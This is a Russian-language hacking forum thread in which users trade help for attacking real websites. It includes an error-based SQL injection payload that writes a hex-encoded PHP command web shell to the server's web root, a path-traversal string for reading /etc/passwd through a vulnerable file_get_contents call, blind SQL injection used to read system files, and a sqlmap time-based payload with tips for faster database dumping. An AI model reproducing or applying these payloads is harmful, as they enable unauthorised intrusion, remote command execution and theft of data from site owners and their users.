25.12.2016, 17:06
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами:
9979143
Репутация:
-5
|
|
Сообщение от qqq1457
↑
http://localhost/'||(select
count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select код шелла в hex from mysql.user into outfile '/var/www/html/UserFiles/shell.php') from information_schema.tables limit 1),1,64),floor(rand(0)*2)))||'
в твоем примере:
http://localhost/'||(select
count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select 0x3C3F7068702073797374656D28245F4745545B22636D6422 5D293B203F3E from mysql.user into outfile '/var/www/html/UserFiles/shell.php') from information_schema.tables limit 1),1,64),floor(rand(0)*2)))||'
если current_user file_priv=Y
попробуй
Уже разобрался мои варианты не работали из-за того что там нет прав на запись((
|
|
|
29.12.2016, 02:06
|
|
Новичок
Регистрация: 18.08.2016
Сообщений: 2
С нами:
5124566
Репутация:
0
|
|
На сайте имеется XSS. На сайте стоит бейзик авторизация ( .htpasswd )
Насколько реально получить Request > Authorization > value ?
 |
|
|
|
29.12.2016, 14:29
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от myblitz
↑
На сайте имеется XSS. На сайте стоит бейзик авторизация ( .htpasswd )
Насколько реально получить Request > Authorization > value ?
не получится
|
|
|
|
29.12.2016, 20:10
|
|
Новичок
Регистрация: 05.04.2013
Сообщений: 0
С нами:
6897206
Репутация:
0
|
|
Код:
$html = @file_get_contents($_GET['param'] . '?q=' . $q);
echo $html;
Могу передать любой param и $q, хочу прочитать конфиг движка. Но проблема, как видим, в том что добавляется '?q=' . $q к пути, следовательно путь становится не корректным. Что можно сделать?
|
|
|
|
30.12.2016, 01:35
|
|
Новичок
Регистрация: 23.10.2016
Сообщений: 5
С нами:
5029526
Репутация:
0
|
|
Привет, есть blind sql inj, могу читать файлы, но факт в том, что не все, то-есть /etc/passwd, /etc/mysql/my.cnf/, /etc/hosts читаются без проблем, а вот файл index.php не хочет, и конфиги апача тоже не видит, хотя путь 100% верный, так-как есть phpinfo() файл и через него все видно.
|
|
|
|
30.12.2016, 02:18
|
|
Познающий
Регистрация: 20.12.2016
Сообщений: 74
С нами:
4946006
Репутация:
0
|
|
ребзя, очень срочно требуется получить полный путь на сервере, есть sql shell...
UPD: Не актуально, нашел в логах одной из табл
|
|
|
|
30.12.2016, 08:50
|
|
Участник форума
Регистрация: 30.12.2016
Сообщений: 218
С нами:
4931606
Репутация:
138
|
|
Сообщение от weleor
↑
Привет, есть blind sql inj, могу читать файлы, но факт в том, что не все, то-есть /etc/passwd, /etc/mysql/my.cnf/, /etc/hosts читаются без проблем, а вот файл index.php не хочет, и конфиги апача тоже не видит, хотя путь 100% верный, так-как есть phpinfo() файл и через него все видно.
Читаешь с правами мускула (или какая там СУБД).
Чмоды выставлены так, что у мускула нет прав на чтение этих файлов.
|
|
|
|
30.12.2016, 11:14
|
|
Участник форума
Регистрация: 30.12.2016
Сообщений: 218
С нами:
4931606
Репутация:
138
|
|
Сообщение от Zmaster_
↑
Код:
$html = @file_get_contents($_GET['param'] . '?q=' . $q);
echo $html;
Могу передать любой param и $q, хочу прочитать конфиг движка. Но проблема, как видим, в том что добавляется '?q=' . $q к пути, следовательно путь становится не корректным. Что можно сделать?
Читалка будет работать, если в $q передать по типу
Код:
/../../../../../etc/passwd
param=any
|
|
|
|
01.01.2017, 19:37
|
|
Новичок
Регистрация: 23.10.2016
Сообщений: 5
С нами:
5029526
Репутация:
0
|
|
Привет, sqlmap очень медленно делает дамп, (~ 1 символ за минуту). Может можно как-нибудь ускорить?
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=&password=" AND (SELECT * FROM (SELECT(SLEEP(5)))MCPI) AND "cNZX" LIKE "cNZX
[18:18:57] [ERROR] invalid character detected. retrying..
[18:24:18] [ERROR] invalid character detected. retrying..
[18:25:57] [ERROR] invalid character detected. retrying..
[18:27:36] [ERROR] invalid character detected. retrying..
[18:29:15] [ERROR] invalid character detected. retrying..
[18:30:55] [ERROR] unable to properly validate last character value ('ч')..
|
|
|
|
02.01.2017, 18:01
|
|
Познающий
Регистрация: 20.12.2016
Сообщений: 74
С нами:
4946006
Репутация:
0
|
|
Сообщение от weleor
↑
Привет, sqlmap очень медленно делает дамп, (~ 1 символ за минуту). Может можно как-нибудь ускорить?
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=&password=" AND (SELECT * FROM (SELECT(SLEEP(5)))MCPI) AND "cNZX" LIKE "cNZX
[18:18:57] [ERROR] invalid character detected. retrying..
[18:24:18] [ERROR] invalid character detected. retrying..
[18:25:57] [ERROR] invalid character detected. retrying..
[18:27:36] [ERROR] invalid character detected. retrying..
[18:29:15] [ERROR] invalid character detected. retrying..
[18:30:55] [ERROR] unable to properly validate last character value ('ч')..
--thread 10
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
